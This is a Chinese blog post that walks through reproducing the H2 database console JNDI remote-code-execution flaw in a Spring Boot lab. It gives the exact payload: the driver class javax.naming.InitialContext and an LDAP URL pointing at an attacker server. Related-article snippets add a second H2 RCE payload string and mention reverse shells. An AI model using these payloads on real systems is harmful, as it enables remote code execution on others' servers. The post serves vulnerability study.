h2 database console JNDI RCE复现

最新推荐文章于 2023-09-20 17:18:15 发布
最新推荐文章于 2023-09-20 17:18:15 发布
阅读量1.5k 收藏
点赞数
分类专栏: java安全 文章标签: 数据库 安全 spring boot 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/121843793
版权

h2 database console JNDI RCE复现

漏洞环境:

https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-h2-database-rce

漏洞复现:

  1. 访问 /h2-console 接口,目标会跳转到 /h2-console/login.do,这有一个可以连接 JDBC 服务的功能

  2. 把 Driver Class 设置为 javax.naming.InitialContext,JDBC URL 设置为 ldap://10.137.204.238:1389/Evil,账号密码均设置为空,点击 Connect 即可(Setting Name和Saved Settings随意)

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tyledjJP-1639053878368)(C:\Users\ky\AppData\Roaming\Typora\typora-user-images\image-20211209204111394.png)]

利用条件:

  1. 目标可出外网,即可以连接到恶意 LDAP 服务
  2. spring.h2.console.enabled=true 配置为 true,为 false 则访问不了 /h2-console 接口

Reference:

https://github.com/LandGrey/SpringBootVulExploit
https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ

0x6b79
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
H2db console 未授权访问RCE 漏洞复现+利用(CVE-2022-23221)
0xSec
02-21 2942
H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞,在 v2.1.210+ 中修复。2.1.210 之前的 H2 控制台允许远程攻击者通过包含 IGNORE_UNKNOWN_SETTINGS=TRUE;INIT=RUNSCRIPT 子字符串的 jdbc:h2:mem JDBC URL 执行任意代码。
H2Database中文教程
05-22
H2Database中文教程】是针对H2数据库的详细指南,涵盖了从数据库配置到与各种框架集成的多个方面。H2Database是一款轻量级、高性能的内存数据库,它支持多种数据库模式,包括单用户模式、多用户服务器模式,以及...
spring boot远程代码执行漏洞复现
最新发布
qq_63980959的博客
09-20 4673
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞复现方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码。
SpringBoot历史漏洞复现
weixin_53747497的博客
04-01 7167
Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开 箱即用的模块,如:Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、 Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早 期阶段,我们需要编写大量的代码来将记录插入到数据库中。
服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞复现
ran的博客
05-07 2822
默认端口:InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。InfluxDB 的一些主要特点包括:高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。
Spring Boot RCE到内存马探索
小王的储物间
02-13 1269
SpringBootVulExploit是Spring Boot漏洞Checklist,但在真正的环境中进行漏洞利用还是有一段距离的,因此衍生出了SpringBootExploit工具。本文是对该Checklist到内存马探索之路的记录。可能是大多数人没有需求,或者是安全研究员没有打红队的原因。导致利用方式普遍都是以弹计算器为最终结果,不能进一步深入利用,导致很多漏洞不了了之。目前网上普遍分析文章,复现文章都是以弹计算器结束,但这其实与实战化的需求还存在着很远的一段路程。
H2 Database Console未授权访问漏洞复现+利用
0xSec
04-08 1868
H2 database是一款Java内存数据库,多用于单元测试。利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。
【实战系列4】H2 Database Console未授权访问/命令执行漏洞到msf内网提权渗透
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-13 1393
通过H2Database Console的命令执行漏洞,结合windows的powershell反弹shell,再利用msf提权并开启rdp服务,在管理员修改了默认的rdp端口3389的情况下,利用命令找到真正的rdp服务端口,远程连接控制目标主机。
[Timeline Sec] - CVE-2020-1947:ShardingSphere RCE 复现1
08-03
为了复现这个漏洞,首先需要搭建一个测试环境。这包括下载并编译ShardingSphere UI,可以从GitHub仓库获取4.0.0版本的源码,然后执行`mvn clean package`进行构建。接着,需要安装Zookeeper,设置默认配置,并启动...
database jndi setting ehcache
05-29
总的来说,`database jndi setting ehcache`涉及到了Java应用的两大关键组件——数据库连接管理和高效的缓存机制。理解并正确配置这两个部分,对于优化应用性能、提高系统可用性至关重要。通过阅读和理解上述配置...
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1...如何RCE 步骤1:设定Weblogic 步骤2:登入 步骤3:设定JNDI伺服器 java -cp marshals
JNDI.rar_jndi
09-19
Java Naming and Directory Interface (JNDI) 是Java平台中用于访问命名和目录服务的API,它为各种命名和目录服务提供了统一的接口。在Java应用中,JNDI常用来获取数据库连接或数据源,这正是"JNDI.rar_jndi"这个...
JNDI.zip_jndi
09-20
JNDI 功能 介绍 教程,需要学习JNDI
JNDI.rar_JNDI A
09-23
标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI SPI的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互
H2 Database Console未授权访问
zzzzz1284的博客
01-06 1012
H2 Database Console未授权访问
H2database-未授权访问漏洞复现
weixin_45366453的博客
06-29 2835
H2 database是一款Java内存数据库,多用于单元测试。默认端口:20051H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。执行如下命令启动一个Springboot + h2database环境:启动后,访问即可查看到H2 database的管理页面。下载JNDI-Injection-Exploithttps://github.co
Spring Boot 使用 H2 数据库的控制台(Console
HONEY MOOSE
04-05 9048
如果你希望在 Spring Boot 启用 H2 数据库的话,这篇文章适合你进行了解。 概述 在这个指南中,我们将会考虑如何在 Spring Boot 中使用 H2 数据库。 与其他数据库相似,Spring Boot 生态系统中能够完全支持 H2 数据库 依赖(Dependencies) 让我们首先需要定义 H2 数据库依赖:https://search.maven.org/searc...
爆肝!!包含复现流程、部分exp、poc和编码小脚本的11个Spring漏洞复现合集
qq_43606723的博客
07-31 1649
这篇包含复现流程、部分exp、poc、加工小脚本和小心得的11个Spring漏洞复现合集是我与shmily师傅利用hvv前的空余时间复现、编写出来的。希望能简化大家开始着手系统性学习Spring框架的繁琐流程,提升学习效率。文章内容如有不妥和错误,请大佬们斧正。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值